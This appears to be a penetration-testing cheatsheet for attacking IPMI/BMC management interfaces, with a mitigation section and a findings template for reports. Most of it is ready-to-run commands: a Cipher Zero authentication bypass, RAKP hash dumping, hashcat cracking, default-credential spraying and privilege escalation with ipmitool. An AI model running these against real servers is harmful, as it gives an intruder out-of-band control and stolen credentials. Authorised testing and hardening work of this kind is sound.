🛡️ Methodology Checklist
- Detect IPMI:
nmap -sU -p 623 [TARGET]or Metasploit scanner - Check cipher 0 auth bypass:
ipmitool -I lanplus -C 0 -H [TARGET] -U admin -P "" user list - Dump password hashes (RAKP): MSF module
ipmi_dumphashes - Crack hashes:
hashcat -m 7300 ipmi_hashes.txt [wordlist] - Try default credentials: admin/admin, admin/password, ADMIN/ADMIN
- If access: check boot order, console redirection, power control
- Document IPMI firmware version and access level gained
🎯 Operational Context
Think Dumber First: Test Cipher Zero before anything else — it bypasses authentication entirely on a majority of unpatched BMCs. If patched, spray default credentials:
admin/admin,ADMIN/ADMIN,root/calvin(Dell iDRAC default). BMC access = out-of-band server control, hardware-level persistence, and BIOS-level access.
When you land here: UDP/623 open in nmap. Run MSF ipmi_version scanner to identify protocol version. If IPMI v2.0, run ipmi_cipher_zero — if vulnerable, dump hashes with ipmi_dumphashes. Crack offline with hashcat mode 7300.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -sU --script ipmi-version -p 623 [TARGET_IP] | Detect IPMI version and auth capabilities |
msf6 > use auxiliary/scanner/ipmi/ipmi_version | Metasploit IPMI version scanner |
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes | Dump RAKP hashes for default users |
set OUTPUT_HASHCAT_FILE /tmp/ipmi_hashes | Save hashes for offline cracking |
hashcat -m 7300 ipmi_hashes.txt /usr/share/wordlists/rockyou.txt | Dictionary attack on IPMI RAKP hashes |
hashcat -m 7300 ipmi.txt -a 3 -1 ?d?u ?1?1?1?1?1?1?1?1 | Mask attack for HP iLO default passwords (8 chars, uppercase + digits) |
🔬 Deep Dive & Workflow
Initial Enumeration
- Nmap scan:
sudo nmap -sU --script ipmi-version -p 623 [TARGET_IP] - Note IPMI version —
IPMI-2.0is vulnerable to RAKP hash dump - Check
UserAuth: PassAuthsettings in scan output - Try Metasploit if Nmap inconclusive:
auxiliary/scanner/ipmi/ipmi_version - Try default credentials (table below)
Attacks
- Dump RAKP hashes:
auxiliary/scanner/ipmi/ipmi_dumphashes - Set
OUTPUT_HASHCAT_FILEto save hashes - Crack with hashcat mode 7300:
hashcat -m 7300 ipmi_hashes.txt rockyou.txt - If HP iLO and dictionary fails → mask attack:
hashcat -m 7300 ipmi.txt -a 3 -1 ?d?u ?1?1?1?1?1?1?1?1 - With credentials → access BMC web console (power control, BIOS, serial)
- BMC access ≈ physical server access
Core Concept
IPMI (Intelligent Platform Management Interface) provides hardware-based host management via a BMC (Baseboard Management Controller) — independent of CPU, BIOS, and OS. Allows “out-of-band” server management even when powered off.
Compromising IPMI ≈ physical access to the server.
Default Credentials
| Product | Username | Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| Supermicro | ADMIN | ADMIN |
| HP iLO | Administrator | 8-char randomized (A-Z, 0-9) |
IPMI 2.0 RAKP Vulnerability
Critical design flaw: the server sends the salted password hash of a user before authentication completes. An attacker knowing only a valid username (defaults: admin, root, Administrator) can dump hashes without credentials.
Hashcat mode 7300 — format: user:salt:hash...
HP iLO mask pattern: 8 characters, uppercase letters + digits only.
Mitigation
- Segment IPMI interfaces on a dedicated Management VLAN — never expose to general network or internet.
- Change all default passwords immediately.
- Keep BMC firmware updated.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
ipmitool -I lanplus -C 0 fails with ‘Unable to establish LAN session’ | Cipher Zero patched on this BMC | Try default credential spray: ipmitool -I lanplus -H [TARGET] -U admin -P admin user list |
| MSF ipmi_dumphashes returns no hashes | IPMI 1.5 (no RAKP), or session limit reached | Use use auxiliary/scanner/ipmi/ipmi_login with common creds for v1.5; check MSF output for IPMI version |
| hashcat mode 7300 cracks but creds rejected on web interface | Hash corresponds to a service account not web admin | Try all cracked usernames against BMC web UI on port 443/80; check username from hash output |
| UDP 623 shows ‘open | filtered’ but ipmitool hangs | Firewall allows UDP but blocks IPMI application layer |
| IPMI credential login works but no commands execute | Insufficient privilege level | Try -L ADMINISTRATOR; escalate: ipmitool -I lanplus -H [TARGET] -U [USER] -P [PASS] -L ADMINISTRATOR user set privilege 2 4 |
📝 Reporting Trigger
Finding Title: IPMI Cipher Zero Authentication Bypass / Default BMC Credentials Impact: Full out-of-band server control — power cycling, virtual console access, BIOS modification, and OS-independent persistence. IPMI hash dump enables offline password cracking for OS-level accounts if password reuse exists. Root Cause: BMC firmware supports Cipher Suite 0 (no-auth cipher) on UDP/623, or default vendor credentials not changed post-deployment. Recommendation: Update BMC firmware to latest version. Disable Cipher Suite 0 in IPMI configuration. Change all default BMC credentials. Isolate IPMI/BMC network segment from production network. Disable IPMI if out-of-band management is not operationally required.